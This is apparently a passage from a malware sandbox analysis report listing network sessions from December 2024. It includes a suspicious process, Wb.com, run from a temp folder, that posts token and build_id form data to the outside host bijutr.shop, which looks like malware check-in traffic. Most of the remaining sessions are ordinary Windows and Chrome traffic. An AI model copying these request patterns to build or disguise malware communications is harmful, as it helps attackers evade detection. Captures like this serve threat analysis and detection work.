                                                                                                                                                                                                                                                                                                      Data Ascii: ------VKXT2NYUK6FU3ECBA1VAContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------VKXT2NYUK6FU3ECBA1VAContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------VKXT2NYUK6FU3ECBA1VACont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:41 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:41 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:41 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      10192.168.2.649793188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:41 UTC323OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----R9ZMGDBAS0ZUAIMGLN7Q
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 489
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:41 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 52 39 5a 4d 47 44 42 41 53 30 5a 55 41 49 4d 47 4c 4e 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 4d 47 44 42 41 53 30 5a 55 41 49 4d 47 4c 4e 37 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 52 39 5a 4d 47 44 42 41 53 30 5a 55 41 49 4d 47 4c 4e 37 51 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------R9ZMGDBAS0ZUAIMGLN7QContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------R9ZMGDBAS0ZUAIMGLN7QContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------R9ZMGDBAS0ZUAIMGLN7QCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:42 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:42 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:42 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                      11192.168.2.64979820.198.119.84443
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 75 6a 75 47 55 45 46 44 73 45 71 74 4c 53 52 31 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 37 62 32 61 62 31 30 33 66 30 32 36 35 35 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: CNT 1 CON 305MS-CV: ujuGUEFDsEqtLSR1.1Context: 2a7b2ab103f02655
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 75 6a 75 47 55 45 46 44 73 45 71 74 4c 53 52 31 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 37 62 32 61 62 31 30 33 66 30 32 36 35 35 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 53 43 63 71 47 62 59 74 57 34 6f 4b 62 78 7a 47 53 71 76 4c 44 76 42 50 4f 2f 73 6f 6d 33 4f 64 4f 43 45 41 6d 39 2f 67 5a 4c 30 47 64 34 78 53 51 52 33 42 4b 31 6b 4a 68 32 39 37 77 4b 34 2b 4a 52 2f 56 6e 58 64 70 6f 54 62 7a 64 35 77 74 55 67 44 45 34 50 65 4a 74 42 34 6c 4c 43 33 58 4a 57 70 6b 63 4b 42 61 35 59 65 6a 6b
                                                                                                                                                                                                                                                                                                      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: ujuGUEFDsEqtLSR1.2Context: 2a7b2ab103f02655<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAASCcqGbYtW4oKbxzGSqvLDvBPO/som3OdOCEAm9/gZL0Gd4xSQR3BK1kJh297wK4+JR/VnXdpoTbzd5wtUgDE4PeJtB4lLC3XJWpkcKBa5Yejk
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 75 6a 75 47 55 45 46 44 73 45 71 74 4c 53 52 31 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 61 37 62 32 61 62 31 30 33 66 30 32 36 35 35 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                                                                                                      Data Ascii: BND 3 CON\WNS 0 197MS-CV: ujuGUEFDsEqtLSR1.3Context: 2a7b2ab103f02655<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6f 49 47 67 4a 51 79 61 31 30 53 2b 53 4b 2f 45 38 48 54 73 46 67 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                                                                                                      Data Ascii: MS-CV: oIGgJQya10S+SK/E8HTsFg.0Payload parsing failed.


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      12192.168.2.649805172.217.21.364435648C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC595OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1266INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:14:44 GMT
                                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                                      Expires: -1
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-wnsYMZoTGJVqvUZM398Nag' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                      Server: gws
                                                                                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC124INData Raw: 37 30 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 6f 6b c3 a9 6d 6f 6e 20 67 6f 20 68 6f 6c 69 64 61 79 20 70 61 72 74 20 32 22 2c 22 6d 69 63 68 61 65 6c 20 70 65 6e 69 78 20 6a 72 20 66 61 6c 63 6f 6e 73 20 68 69 67 68 6c 69 67 68 74 73 22 2c 22 74 65 73 63 6f 20 61 6c 64 69 20 6d 6f 72 72 69 73 6f 6e 73 20 70 72 6f 64 75 63 74 20 72 65 63 61 6c 6c 73 22 2c 22 71 75
                                                                                                                                                                                                                                                                                                      Data Ascii: 70a)]}'["",["pokmon go holiday part 2","michael penix jr falcons highlights","tesco aldi morrisons product recalls","qu
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 6f 72 64 6c 65 20 68 69 6e 74 73 20 64 65 63 65 6d 62 65 72 20 32 33 22 2c 22 6d 69 63 68 69 67 61 6e 20 77 69 6e 74 65 72 20 77 65 61 74 68 65 72 20 61 64 76 69 73 6f 72 79 22 2c 22 6d 6f 6e 64 61 79 20 6e 69 67 68 74 20 66 6f 6f 74 62 61 6c 6c 22 2c 22 6c 6f 67 61 6e 20 61 69 72 70 6f 72 74 20 68 6f 6c 69 64 61 79 20 74 72 61 76 65 6c 20 64 65 6c 61 79 73 22 2c 22 61 65 77 20 64 79 6e 61 6d 69 74 65 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c 22 67 6f 6f 67 6c 65 3a 67 72 6f 75 70 73 69 6e 66 6f 22 3a 22 43 68 67 49 6b 6b 34 53 45 77 6f 52 56 48 4a 6c 62 6d 52 70
                                                                                                                                                                                                                                                                                                      Data Ascii: ordle hints december 23","michigan winter weather advisory","monday night football","logan airport holiday travel delays","aew dynamite"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRp
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC295INData Raw: 6e 52 58 61 6c 6f 35 61 6a 4e 58 65 6b 52 57 5a 55 78 69 54 48 49 78 4e 58 4e 42 55 30 4e 43 4b 30 52 6e 61 7a 6c 6e 59 31 6c 50 64 46 4a 48 61 6a 64 30 51 32 6f 77 54 32 70 5a 4d 30 74 50 56 33 64 72 59 6d 6c 54 64 45 52 4b 52 45 56 34 5a 46 4e 70 63 30 45 33 4f 58 55 7a 54 6e 4e 72 4c 30 49 77 63 33 46 57 55 45 52 57 57 6c 4a 46 4d 69 74 76 54 45 56 71 61 46 5a 46 63 7a 68 4d 53 6b 56 6c 51 33 4e 57 5a 47 74 42 4e 31 70 4d 54 48 6f 35 54 57 64 45 56 58 46 4c 63 45 5a 52 61 6a 49 32 61 46 6f 34 54 56 4e 36 64 31 5a 7a 56 30 68 75 51 57 70 57 62 47 52 59 53 45 52 45 63 33 64 43 57 45 46 4c 63 33 41 72 5a 54 4a 77 4f 55 73 33 57 56 68 4a 52 33 64 58 62 31 42 77 4b 32 77 78 62 56 4e 58 63 33 5a 4e 51 6b 31 5a 59 6b 78 6e 4f 47 4e 7a 52 30 4a 43 4e 32 34 76
                                                                                                                                                                                                                                                                                                      Data Ascii: nRXalo5ajNXekRWZUxiTHIxNXNBU0NCK0RnazlnY1lPdFJHajd0Q2owT2pZM0tPV3drYmlTdERKREV4ZFNpc0E3OXUzTnNrL0Iwc3FWUERWWlJFMitvTEVqaFZFczhMSkVlQ3NWZGtBN1pMTHo5TWdEVXFLcEZRajI2aFo4TVN6d1ZzV0huQWpWbGRYSEREc3dCWEFLc3ArZTJwOUs3WVhJR3dXb1BwK2wxbVNXc3ZNQk1ZYkxnOGNzR0JCN24v
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC89INData Raw: 35 33 0d 0a 68 42 56 6d 64 75 61 6a 56 44 51 31 64 36 5a 32 56 75 65 6e 4a 73 55 6e 4a 4d 51 6c 46 6f 61 48 45 33 4e 56 5a 73 63 7a 68 56 61 6d 31 53 51 6b 68 4c 61 32 4e 71 51 55 4a 6d 56 48 70 6a 55 56 4e 78 61 79 73 79 55 57 5a 55 54 33 42 58 4e 6a 64 6e 4d 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 53hBVmduajVDQ1d6Z2VuenJsUnJMQlFoaHE3NVZsczhVam1SQkhLa2NqQUJmVHpjUVNxaysyUWZUT3BXNjdnM
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 31 37 35 33 0d 0a 57 46 36 56 6a 4e 54 4d 54 52 57 61 69 74 72 63 48 42 4a 4d 44 64 30 53 6b 63 77 4d 46 4e 54 57 6a 52 73 56 6c 59 34 57 54 67 30 65 6e 6c 48 63 58 52 32 54 54 49 35 56 32 52 78 4d 6e 4a 69 59 6c 63 79 64 6b 68 6c 59 55 74 58 59 56 6f 76 63 47 39 72 54 58 6c 6e 4f 47 78 4c 62 47 55 30 64 32 31 6a 61 6e 51 76 5a 6c 64 77 63 30 78 4c 64 6a 52 75 62 33 68 57 64 48 6c 30 53 6b 4a 61 52 6d 64 52 55 44 41 7a 61 30 56 53 55 55 31 33 54 30 52 6e 52 57 73 30 53 48 42 75 4d 33 68 77 53 6e 42 36 59 58 4a 54 63 46 49 32 61 6e 64 31 61 31 56 78 61 33 68 7a 65 57 74 43 4b 30 70 48 59 32 5a 50 54 57 6f 34 61 6c 4e 69 55 57 5a 76 4c 32 6c 45 56 32 67 33 55 44 52 70 4d 30 70 77 5a 48 56 54 53 44 5a 56 4d 57 46 73 57 47 39 30 52 54 4e 46 62 33 6c 4c 62 55
                                                                                                                                                                                                                                                                                                      Data Ascii: 1753WF6VjNTMTRWaitrcHBJMDd0SkcwMFNTWjRsVlY4WTg0enlHcXR2TTI5V2RxMnJiYlcydkhlYUtXYVovcG9rTXlnOGxLbGU0d21janQvZldwc0xLdjRub3hWdHl0SkJaRmdRUDAza0VSUU13T0RnRWs0SHBuM3hwSnB6YXJTcFI2and1a1Vxa3hzeWtCK0pHY2ZPTWo4alNiUWZvL2lEV2g3UDRpM0pwZHVTSDZVMWFsWG90RTNFb3lLbU
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 4d 57 4d 34 45 68 4a 55 5a 57 78 6c 64 6d 6c 7a 61 57 39 75 49 48 42 79 62 32 64 79 59 57 30 79 39 78 64 6b 59 58 52 68 4f 6d 6c 74 59 57 64 6c 4c 32 70 77 5a 57 63 37 59 6d 46 7a 5a 54 59 30 4c 43 38 35 61 69 38 30 51 55 46 52 55 32 74 61 53 6c 4a 6e 51 55 4a 42 55 55 46 42 51 56 46 42 51 6b 46 42 52 43 38 79 64 30 4e 46 51 55 46 72 52 30 4a 33 5a 30 68 43 5a 32 74 4a 51 6e 64 6e 53 30 4e 6e 61 30 78 45 55 6c 6c 51 52 46 46 33 54 55 52 53 63 31 56 47 55 6b 46 58 53 55 49 77 61 55 6c 70 51 57 52 49 65 44 68 72 53 30 52 52 63 30 70 44 57 58 68 4b 65 44 68 6d 54 46 51 77 64 45 31 55 56 54 4e 50 61 6d 38 32 53 58 6c 7a 4c 31 4a 45 4f 44 52 52 65 6c 45 31 54 32 70 6a 51 6b 4e 6e 62 30 74 45 55 58 64 4f 52 32 63 34 55 45 64 71 59 32 78 49 65 56 55 7a 54 6e 70
                                                                                                                                                                                                                                                                                                      Data Ascii: MWM4EhJUZWxldmlzaW9uIHByb2dyYW0y9xdkYXRhOmltYWdlL2pwZWc7YmFzZTY0LC85ai80QUFRU2taSlJnQUJBUUFBQVFBQkFBRC8yd0NFQUFrR0J3Z0hCZ2tJQndnS0Nna0xEUllQRFF3TURSc1VGUkFXSUIwaUlpQWRIeDhrS0RRc0pDWXhKeDhmTFQwdE1UVTNPam82SXlzL1JEODRRelE1T2pjQkNnb0tEUXdOR2c4UEdqY2xIeVUzTnp
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 67 77 4d 45 6f 72 4d 6b 4a 54 61 6c 68 7a 53 31 6f 30 4f 45 51 78 65 69 39 42 51 6c 5a 43 5a 57 70 69 61 48 4e 6a 51 6b 6f 35 54 55 51 7a 55 44 52 78 56 30 38 7a 56 6c 46 53 53 31 70 47 61 30 68 48 54 57 4e 56 64 6b 70 6a 54 7a 56 43 57 47 68 61 59 57 4e 6e 64 45 6b 77 51 6b 52 6a 55 33 59 34 51 56 42 54 62 6b 78 58 54 58 6c 52 63 30 52 4b 64 58 6f 31 65 46 4e 57 64 7a 52 71 62 45 52 43 5a 48 46 77 4d 6a 42 53 61 32 6c 4c 62 48 4d 31 63 47 31 48 51 55 64 56 4f 45 55 30 54 30 31 46 4f 45 4e 6e 55 45 74 33 55 57 4d 76 5a 57 31 46 61 46 56 31 5a 56 68 30 56 48 6f 33 53 56 56 61 64 58 42 6e 4e 48 70 35 4d 32 46 7a 63 32 6b 34 61 6b 52 55 55 33 4e 31 56 45 68 48 51 31 4d 79 53 33 6c 69 63 6d 64 6d 54 6d 52 56 63 45 35 6a 57 6b 35 33 59 30 39 68 61 33 52 5a 54
                                                                                                                                                                                                                                                                                                      Data Ascii: gwMEorMkJTalhzS1o0OEQxei9BQlZCZWpiaHNjQko5TUQzUDRxV08zVlFSS1pGa0hHTWNVdkpjTzVCWGhaYWNndEkwQkRjU3Y4QVBTbkxXTXlRc0RKdXo1eFNWdzRqbERCZHFwMjBSa2lLbHM1cG1HQUdVOEU0T01FOENnUEt3UWMvZW1FaFV1ZVh0VHo3SVVadXBnNHp5M2Fzc2k4akRUU3N1VEhHQ1MyS3licmdmTmRVcE5jWk53Y09ha3RZT
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1390INData Raw: 54 44 5a 58 65 6e 5a 69 4d 47 64 6a 53 47 70 34 56 7a 4e 57 62 7a 46 68 61 48 4a 72 61 32 52 76 61 46 52 76 55 45 6c 75 53 6e 68 79 63 56 4a 30 4e 30 4e 7a 56 6d 56 58 5a 44 46 6a 4f 55 35 5a 4e 56 6c 47 55 57 64 72 56 47 52 52 62 6b 4e 78 59 30 31 53 4e 45 39 45 4d 33 46 75 57 6e 5a 45 59 58 68 73 61 6d 74 75 64 7a 68 55 56 47 51 7a 5a 44 68 69 5a 46 64 74 55 6e 6f 33 65 43 73 32 64 6d 52 4e 63 30 6c 30 53 7a 5a 4f 62 56 6c 61 53 58 42 4b 51 32 52 79 65 58 41 77 4d 57 52 6e 54 57 34 78 53 45 46 36 5a 30 67 76 56 6c 46 79 4e 7a 5a 35 4b 32 78 4e 61 6d 4a 6c 52 32 52 6f 57 47 74 6b 65 6d 46 33 55 6a 68 4c 59 6d 56 58 4c 30 30 78 62 7a 64 48 4b 33 52 74 4d 6e 68 4b 53 6b 5a 4c 4e 30 56 4c 5a 57 70 4c 61 32 31 45 61 6c 42 50 4d 47 35 49 51 54 67 78 52 6d 30
                                                                                                                                                                                                                                                                                                      Data Ascii: TDZXenZiMGdjSGp4VzNWbzFhaHJra2RvaFRvUEluSnhycVJ0N0NzVmVXZDFjOU5ZNVlGUWdrVGRRbkNxY01SNE9EM3FuWnZEYXhsamtudzhUVGQzZDhiZFdtUno3eCs2dmRNc0l0SzZObVlaSXBKQ2RyeXAwMWRnTW4xSEF6Z0gvVlFyNzZ5K2xNamJlR2RoWGtkemF3UjhLYmVXL00xbzdHK3RtMnhKSkZLN0VLZWpLa21EalBPMG5IQTgxRm0
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC419INData Raw: 5a 51 4d 58 70 6a 4d 48 70 45 51 58 42 36 51 32 64 34 56 45 78 5a 64 31 6c 51 56 47 6c 54 56 58 64 30 56 6a 42 70 63 48 70 46 64 6b 31 36 55 33 68 4b 51 6c 46 43 58 33 56 52 61 33 70 77 45 77 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 65 76 65 6e 74 69 64 22 3a 2d 31 30 38 30 36 35 38 31 30 37 31 34 37 39 31 36 35 37 38 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 72 65 6c 65 76 61 6e 63 65 22 3a 5b 31 32 35 37 2c 31 32 35 36 2c 31 32 35 35 2c 31 32 35 34 2c 31 32 35 33 2c 31 32 35 32 2c 31 32 35 31 2c 31 32 35 30 5d 2c 22 67 6f 6f 67 6c 65 3a 73 75 67 67 65 73 74 73 75 62 74 79 70 65 73 22 3a 5b 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b 33 2c 31 34 33 2c 33 36 32 5d 2c 5b
                                                                                                                                                                                                                                                                                                      Data Ascii: ZQMXpjMHpEQXB6Q2d4VExZd1lQVGlTVXd0VjBpcHpFdk16U3hKQlFCX3VRa3pwEw\u003d\u003d","zl":10002}],"google:suggesteventid":-1080658107147916578,"google:suggestrelevance":[1257,1256,1255,1254,1253,1252,1251,1250],"google:suggestsubtypes":[[3,143,362],[3,143,362],[
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      13192.168.2.649806172.217.21.364435648C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:44 UTC498OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: www.google.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      X-Client-Data: CJa2yQEIprbJAQipncoBCO6MywEIk6HLAQj6mM0BCIWgzQEI3L3NAQi5ys0BCOnSzQEI6NXNAQjL1s0BCKjYzQEI+cDUFRi60s0BGOuNpRc=
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                      2024-12-23 16:14:45 UTC1018INHTTP/1.1 200 OK
